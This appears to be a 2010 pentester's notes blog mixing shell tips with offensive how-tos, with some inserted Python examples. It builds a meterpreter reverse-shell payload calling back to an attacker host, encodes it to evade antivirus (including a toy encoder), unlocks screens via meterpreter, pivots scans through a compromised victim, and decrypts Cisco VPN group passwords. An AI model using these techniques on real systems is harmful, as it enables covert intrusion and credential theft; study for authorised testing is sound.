Wednesday, June 30, 2010

Meterpreter VNC and Screen unlock

Note: May need to run vnc twice due to some bugs.

meterpreter > run vnc
meterpreter > run screen_unlock

Monday, June 21, 2010

Bypassing AV with msfencode

Example of piping a raw (R) meterpreter payload into msfencode, encoding it with x86/shikata_ga_nai for 10 iterations (-c 10) and wrapping the result in an exe:

./msfpayload windows/meterpreter/reverse_tcp LHOST=[local_ip] LPORT=8888 R | msfencode -t exe -e x86/shikata_ga_nai -c 10 -o novacoast_encoded.exe

Caveat: each extra iteration only re-encodes the previous output (decoder stub included), and the default exe template msfencode wraps it in is itself well known to AV, so the iteration count alone is not a reliable bypass.
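To see what those iterations actually do to the payload bytes, here is a simplified model of an XOR additive-feedback encoder, the family shikata_ga_nai belongs to. This is an added example, not Metasploit's code: the real module also emits a polymorphic x86 decoder stub and randomises registers and instruction order, none of which is modelled here, and the feedback direction (the plaintext dword is added to the running key) is an assumption made for illustration. The sample payload bytes are constructed.

```python
"""Toy XOR additive-feedback encoder in the style of x86/shikata_ga_nai.

Added example, not Metasploit's code. Assumptions: 4-byte key, little-endian
dwords, and the *decoded* dword is folded into the key after each block (the
mirror of a decoder loop that XORs in place and then adds what it just
decoded). No decoder stub is generated.
"""
import os
import struct


def _dwords(data):
    """Split into little-endian dwords, zero-padding to a 4-byte boundary."""
    data += b"\x00" * ((-len(data)) % 4)
    return list(struct.unpack("<%dI" % (len(data) // 4), data))


def encode_once(payload, key=None):
    """One pass: XOR each dword with the running key, then key += plaintext.

    The same plaintext dword therefore encodes differently each time it
    appears, which is what defeats a fixed byte signature on the payload.
    Returns (key, encoded_bytes); output may carry up to 3 padding NULs.
    """
    if key is None:
        key = struct.unpack("<I", os.urandom(4))[0]
    k, out = key, []
    for d in _dwords(payload):
        out.append(d ^ k)
        k = (k + d) & 0xFFFFFFFF
    return key, struct.pack("<%dI" % len(out), *out)


def decode_once(key, blob):
    """What the decoder stub does at run time: xor, then add the decoded dword."""
    k, out = key, []
    for c in struct.unpack("<%dI" % (len(blob) // 4), blob):
        d = c ^ k
        out.append(d)
        k = (k + d) & 0xFFFFFFFF
    return struct.pack("<%dI" % len(out), *out)


def encode_iterations(payload, count, keys=None):
    """msfencode -c N: feed the previous output back in N times.

    Returns (keys_used, blob). Pass `keys` for reproducible output; otherwise
    a fresh random key is drawn per iteration, as the real encoder does.
    """
    blob, used = payload, []
    for i in range(count):
        k, blob = encode_once(blob, None if keys is None else keys[i])
        used.append(k)
    return used, blob


def decode_iterations(keys, blob):
    """Undo encode_iterations by applying the keys in reverse order."""
    for k in reversed(keys):
        blob = decode_once(k, blob)
    return blob


def signature_hits(blob, signature):
    """Naive byte-pattern check, the kind of match a static AV signature makes."""
    return blob.count(signature)
```

With a fixed key the two identical "calc" dwords in b"calccalc" come out as different ciphertext, so a signature on "calc" finds nothing in the encoded blob while a round trip through decode_iterations restores the original; what the model cannot show is the decoder stub that has to be prepended, which is the part AV engines learned to sign.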

Thursday, June 17, 2010

Screen

#screen            // start a new session
#[run cmd]
#[ctrl+A, ctrl+D]  // detach, leaving the command running
#screen -r         // return to (reattach) the session
#screen -ls        // list sessions

Wednesday, June 16, 2010

Configuring Cisco VPN client on Ubuntu/BT4

Source:

Directly copy and pasted:

Client config:

* Download cisco-decrypt file which will be used to decrypt the group password from your pcf file:

wget http://www.debuntu.org/files/cisco-decrypt.c

sudo apt-get install libgcrypt11-dev

gcc -Wall -o cisco-decrypt cisco-decrypt.c $(libgcrypt-config --libs --cflags)

chmod +x cisco-decrypt

sudo cp cisco-decrypt /usr/bin

* Download pcf2vpnc to convert pcf files in vpnc configuration format

wget http://svn.unix-ag.uni-kl.de/vpnc/trunk/pcf2vpnc

chmod +x pcf2vpnc

sudo cp pcf2vpnc /usr/bin

* Go to windows vpn profiles directory and convert .pcf files to .conf files

pcf2vpnc cisco.pcf > cisco.conf

Note: replace cisco.pcf above with your own .pcf file. The enc_GroupPwd value in the .pcf is only obfuscated (cisco-decrypt reverses it with no secret input), so treat the .pcf file itself as the group pre-shared key.

sudo cp cisco.conf /etc/vpnc/

* install vpnc and connect to vpn

sudo apt-get install vpnc resolvconf

sudo vpnc cisco

Enter username for :
Enter password for :
VPNC started in background (pid: 6092)…

* To disconnect simply do

sudo vpnc-disconnect
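The conversion pcf2vpnc performs in the steps above, written out as an added example (this is not the pcf2vpnc script and not from the original page). The .pcf key names (Host, GroupName, GroupPwd, enc_GroupPwd, Username, UserPassword) are the standard Cisco profile keys; the sample profile and its enc_GroupPwd hex string are constructed, and the 3DES unwrapping of enc_GroupPwd is left to cisco-decrypt, whose output is passed in as group_secret.

```python
"""Map a Cisco VPN client .pcf profile onto a vpnc configuration.

Added example, not the pcf2vpnc script. The sample profile below is
constructed; its enc_GroupPwd is a made-up hex string, not a real secret.
"""
import configparser

SAMPLE_PCF = """[main]
Description=Corporate VPN (constructed sample)
Host=vpn.example.com
AuthType=1
GroupName=employees
GroupPwd=
enc_GroupPwd=7F3A9C0B1D2E4F5A6B7C8D9E0F1A2B3C4D5E6F7A8B9C0D1E2F3A4B5C6D7E8F9A
EnableISPConnect=0
Username=jdoe
UserPassword=
SaveUserPassword=0
"""


def parse_pcf(text):
    """Return the [main] section of a .pcf as a dict, preserving key case."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.optionxform = str        # keep GroupPwd and enc_GroupPwd distinct
    cp.read_string(text)
    return dict(cp["main"])


def to_vpnc_conf(profile, group_secret=None):
    """Build the minimum vpnc.conf text for `sudo vpnc <name>`.

    A plaintext GroupPwd is used directly. If the profile only carries
    enc_GroupPwd, the caller must supply the decrypted value (the output of
    cisco-decrypt) as group_secret; the obfuscation is keyless, so the .pcf
    is as sensitive as the resulting vpnc.conf and both belong in /etc/vpnc
    with root-only permissions.
    """
    secret = profile.get("GroupPwd") or group_secret
    if not secret:
        if profile.get("enc_GroupPwd"):
            raise ValueError("profile has only enc_GroupPwd; run cisco-decrypt "
                             "on it and pass the result as group_secret")
        raise ValueError("profile has no group password")
    lines = [
        "IPSec gateway %s" % profile["Host"],
        "IPSec ID %s" % profile["GroupName"],
        "IPSec secret %s" % secret,
    ]
    if profile.get("Username"):
        lines.append("Xauth username %s" % profile["Username"])
    if profile.get("UserPassword"):          # usually empty: vpnc prompts
        lines.append("Xauth password %s" % profile["UserPassword"])
    return "\n".join(lines) + "\n"
```

Writing the returned text to /etc/vpnc/cisco.conf is equivalent to the `pcf2vpnc cisco.pcf > cisco.conf` step; vpnc prompts for the Xauth password when the file does not contain one.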

Once the VPN is up, connect to the remote desktop:

Go to Applications >> Internet >> Terminal server client

Or

In terminal run

tsclient

Thursday, June 10, 2010

Use sed to remove leading whitespace

Strips spaces and tabs from the start of each line only (\t inside a bracket expression is a GNU sed extension):

#sed -e 's/^[ \t]*//' [file.txt]

VIM delete from line number to line number

:[start_line_#],[end_line_#]d

Wednesday, June 2, 2010

Cut fields

Print field 3 through the last field of each tab-delimited line (this drops the first two fields; cut only counts from the left, so dropping the last field needs awk or a rev | cut | rev pipeline instead):

$cut -f3- [input_file]

Symantec SIM Command Line DB2 Backups

As db2admin:

#/opt/Symantec/simserver/simdbmu/bin/simbackup.sh full ONLINE

Scanning through Meterpreter and SSH Tunnel

By Mark Baggett


The Players
Attacker 172.16.186.132
Victim 172.16.186.126

Step 1 - After you have meterpreter access install OpenSSH on the victim's computer. Joff Thyer, packet guru, crazy aussie and all around smart guy did a great job of outlining the install process on his blog. I pretty much just followed his instructions here.

Step 2 - After you've installed OpenSSH and set up your account, use Meterpreter's PORTFWD command to forward a port from the attacker's machine to the SSH listener on the victim's machine. For example:

meterpreter> portfwd add -L 172.16.186.132 -l 8000 -r 172.16.186.128 -p 22

(Notes to self: alternatively without Meterpreter: ssh -L 8000:localhost:22 username@victim)

This command sets up a listener on port 8000 of the attacker's IP (172.16.186.132) and forwards packets to port 22 on the victim's machine (172.16.186.128).


Step 3 - SSH into the portfwd port you just created and set up a dynamic port forwarder on your machine. For example:

# ssh -D 127.0.0.1:9000 -p 8000 username@172.16.186.132

(My own notes: ssh -D 127.0.0.1:9000 -p 8000 username@attackermachine)

This command sets up a SOCKS4 proxy on port 9000 which is forwarded through the SSH session on the victim.

Step 4 - Use PROXYCHAINS to forward your nessusd traffic through the SOCKS4 listener on port 9000. This is as simple as changing the TCP port on the last line of /etc/proxychains.conf from its default of 9050 to port 9000 and launching nessusd through proxychains as follows:

# proxychains /usr/sbin/nessusd -D

Step 5 - Start the Nessus client and do your scan.
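What passes between proxychains and the ssh -D listener in steps 3 and 4 is a SOCKS4 CONNECT handshake, shown below as an added example (not code from the original post). The mock proxy is a loopback stand-in for the sshd end so the exchange can run offline; the target addresses in the tests are constructed and connect to nothing. One caveat worth knowing before step 5: proxychains works by hooking libc connect(), so only TCP connections go through the tunnel. Nessus's ICMP ping and any raw-socket SYN scanning or UDP probing still leave the attacker box directly, so use TCP connect scanning, and enable proxy_dns if names should resolve from the victim's side (that uses the SOCKS4a hostname form handled here).

```python
"""SOCKS4/4a CONNECT exchange between a proxychains-wrapped client and an
ssh -D listener. Added example; the mock proxy is a constructed stand-in."""
import socket
import struct
import threading

SOCKS4_VERSION = 0x04
CMD_CONNECT = 0x01
REPLY_GRANTED = 0x5A    # request granted
REPLY_REJECTED = 0x5B   # request rejected or failed


def build_connect_request(dest_host, dest_port, userid=b""):
    """Bytes the client sends to ask the proxy for a TCP connection.

    A dotted IPv4 address uses the plain v4 layout. Any other name uses the
    SOCKS4a extension: DSTIP = 0.0.0.1 and the hostname follows USERID, so
    the proxy end (sshd on the victim) resolves it, not the scanner's host.
    """
    try:
        ip, hostname = socket.inet_aton(dest_host), b""
    except OSError:
        ip, hostname = b"\x00\x00\x00\x01", dest_host.encode() + b"\x00"
    header = struct.pack("!BBH4s", SOCKS4_VERSION, CMD_CONNECT, dest_port, ip)
    return header + userid + b"\x00" + hostname


def parse_reply(data):
    """Parse the fixed 8-byte reply into (granted, bound_port, bound_ip)."""
    if len(data) != 8 or data[0] != 0x00:        # VN is always 0 in replies
        raise ValueError("malformed SOCKS4 reply: %r" % (data,))
    _vn, cd, port, ip = struct.unpack("!BBH4s", data)
    return cd == REPLY_GRANTED, port, socket.inet_ntoa(ip)


def recv_exact(sock, n):
    """Read exactly n bytes; SOCKS has no length prefix, so never short-read."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed mid-handshake")
        buf += chunk
    return buf


def socks4_connect(proxy_host, proxy_port, dest_host, dest_port, timeout=5.0):
    """Client side: what proxychains does inside the hooked connect() call."""
    sock = socket.create_connection((proxy_host, proxy_port), timeout=timeout)
    sock.sendall(build_connect_request(dest_host, dest_port))
    granted, _, _ = parse_reply(recv_exact(sock, 8))
    if not granted:
        sock.close()
        raise ConnectionError("proxy refused %s:%d" % (dest_host, dest_port))
    return sock     # from here on the socket carries the scanner's own traffic


def _read_cstring(sock):
    buf = b""
    while True:
        c = recv_exact(sock, 1)
        if c == b"\x00":
            return buf
        buf += c


def parse_connect_request(sock):
    """Proxy side: decode a CONNECT request into (host, port, userid)."""
    vn, cd, port, ip = struct.unpack("!BBH4s", recv_exact(sock, 8))
    if vn != SOCKS4_VERSION or cd != CMD_CONNECT:
        raise ValueError("not a SOCKS4 CONNECT request")
    userid = _read_cstring(sock)
    if ip[:3] == b"\x00\x00\x00" and ip[3] != 0:   # 4a marker: 0.0.0.x, x != 0
        host = _read_cstring(sock).decode()
    else:
        host = socket.inet_ntoa(ip)
    return host, port, userid


def start_mock_proxy(reject_port=None):
    """Loopback stand-in for the ssh -D listener (constructed for this example).

    Serves one client: parses its CONNECT, grants it unless the port equals
    reject_port, then echoes a 4-byte probe so the caller can confirm data
    flows through the granted tunnel. Returns (listen_port, seen_requests).
    """
    seen = []
    lsock = socket.socket()
    lsock.bind(("127.0.0.1", 0))
    lsock.listen(1)

    def serve():
        conn, _ = lsock.accept()
        lsock.close()
        with conn:
            req = parse_connect_request(conn)
            seen.append(req)
            granted = req[1] != reject_port
            code = REPLY_GRANTED if granted else REPLY_REJECTED
            conn.sendall(struct.pack("!BBH4s", 0, code, 0, b"\x00" * 4))
            try:
                if granted:
                    conn.sendall(recv_exact(conn, 4))
            except ConnectionError:
                pass        # client hung up without sending a probe

    threading.Thread(target=serve, daemon=True).start()
    return lsock.getsockname()[1], seen
```

Against the real setup the client call would be socks4_connect("127.0.0.1", 9000, target, port): the 8-byte request goes to the local ssh -D listener, sshd on the victim opens the outbound TCP connection, and the 0x5A reply is the point after which every byte on the socket is the scanner's.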